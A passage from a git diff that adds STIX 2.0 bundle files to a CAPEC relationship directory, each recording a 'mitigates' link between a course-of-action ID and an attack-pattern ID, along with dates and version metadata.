"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json new file mode 100644 index 0000000000000000000000000000000000000000..df0bf6ebc577fff2934fc0929be718874977d719 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--d186d1a6-2cf9-4d05-88c2-ffe8cc6c3453", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1f65809-af95-4549-8285-b7bac44a07b3", + "target_ref": "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json new file mode 100644 index 0000000000000000000000000000000000000000..109af103ca9d12ccd456d928c98690c7a7e8f31c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--61e5a927-6342-44d8-bef3-0cc26c5851f4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json new file mode 100644 index 0000000000000000000000000000000000000000..a713c3a4c94f0a64a9962d8375bea486f4962760 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ef258a5f-94c5-4e90-8b53-62a669bbe927", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json new file mode 100644 index 0000000000000000000000000000000000000000..c97e7114852711e72657d6da3665884aed44e1f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3a8c8351-937f-473f-b805-ebaad6745f18", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eeb157-8c84-4597-82fa-5def0ac9487f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f830ee1-2df0-423a-a566-4e75e0436eb5", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json new file mode 100644 index 0000000000000000000000000000000000000000..ac7b9314adc08a17a9f5c52d92f794d59a326fbf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8f12bad9-1aea-4a5d-9196-ef486c7bf613", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09525f40-2e8d-420d-a8ee-3893d36113a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json new file mode 100644 index 0000000000000000000000000000000000000000..b1e4d79573b6bdd00e181fa934ed2ff1dd5c05e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6bc06784-98c4-4454-b7dc-fa5d98c631b7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3d3a8f3-1de8-4410-a757-51b9b0ecc214", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json new file mode 100644 index 0000000000000000000000000000000000000000..71816e09161281e1081b41cee597a62e75de20f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5b8dc9ee-fa91-4e92-97e1-f745693b9c55", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json new file mode 100644 index 0000000000000000000000000000000000000000..6f0a1beb6007683d1cfb76cbc8f4125196e2536c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--72863358-ee14-438b-82b5-375d023b2a88", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0993c894-6271-447f-8111-2ee9ee88d8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c434bad9-76f4-48d5-8bb3-9c46c4c91696", + "target_ref": "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json new file mode 100644 index 0000000000000000000000000000000000000000..7087cbb366cca5d3772a884772680940a3a78082 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3a749515-0f51-4c9c-82df-d04550bde9c5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json new file mode 100644 index 0000000000000000000000000000000000000000..1628880882bf3a88c053f337859ff522f28985bc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6288fcee-c9a8-40f7-8cb3-190ad1d3ed41", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--829e2480-f52a-4109-acba-ab3433ccf5a2", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json new file mode 100644 index 0000000000000000000000000000000000000000..afb71d3c7734376ee66c3e82feb96bc24f94454b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--240e1c91-44a9-490a-ae4f-e90f13276083", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json new file mode 100644 index 0000000000000000000000000000000000000000..08eae069c6826422a0608a325aeb26705bd39a50 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5fcba091-4c05-4542-934f-1a3b4278017a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json new file mode 100644 index 0000000000000000000000000000000000000000..90e2e0f5ead1301df1f8669c096155d25b987271 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--57213e99-f04b-410c-b608-756427a1e883", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json new file mode 100644 index 0000000000000000000000000000000000000000..bc86e8f80c62c198b47675ecf5e6565b000c2e9e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6c82a833-b5c7-4eb8-a803-089c37c80589", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json new file mode 100644 index 0000000000000000000000000000000000000000..e9f5ac568e140719a0d013d87ee23ca828ba5faf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--44e860ad-19bf-48b8-9f5a-1c424cf376ae", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json new file mode 100644 index 0000000000000000000000000000000000000000..89faaba9a5f970ecd23646980a3fbcf8219f23c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b3cb244e-54dd-4ecc-978b-4773abf6f480", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json new file mode 100644 index 0000000000000000000000000000000000000000..6de2fa6e106b3e94a8ca06ab4b86a30378b6561c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0c86d3a4-7ccf-4145-bfaa-43805442105f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json new file mode 100644 index 0000000000000000000000000000000000000000..2744e2b802a72cb6da4258671851bb2279bf3d97 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3e481095-44e2-4cd7-b0c9-16d3c03c94d2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json new file mode 100644 index 0000000000000000000000000000000000000000..63aadfe69d90ea0c318c095d1b20a6f44d3457d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--32b37420-2ec4-49ec-ae62-3803f1e60b51", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bd7c5b7-b55f-4fac-a850-306a427dbaf8", + "target_ref": "attack-pattern--a7cc8cb3-8652-4669-893a-baaa21f7eb55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json new file mode 100644 index 0000000000000000000000000000000000000000..a965afe297749cb8a527a3130a5c01d1dc1d169a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5f7b4dd6-77ff-4a89-820d-7cc97e59b731", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json new file mode 100644 index 0000000000000000000000000000000000000000..6a6f3a004eca05d8ef3b877f13a3e92ee5fa9239 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cdcbb2bf-523f-4650-ad17-ab00af58abcf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json new file mode 100644 index 0000000000000000000000000000000000000000..b26a55cb3dd95fc4e9edcdbec3d9265d02bd0056 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--20f51183-7658-4503-8506-a36481c928d2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json new file mode 100644 index 0000000000000000000000000000000000000000..0d5e426ea2b90e91fb7a0f58df413d0754919b60 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cc80ef6c-6336-4a2d-92d7-79097f4c2340", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb", + "modified": 